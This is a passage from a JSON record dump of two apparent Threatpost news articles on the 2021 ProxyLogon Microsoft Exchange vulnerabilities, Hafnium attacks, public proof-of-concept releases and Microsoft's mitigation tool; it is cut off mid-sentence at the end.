KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. \u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched following bugs this week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. \u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. \u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in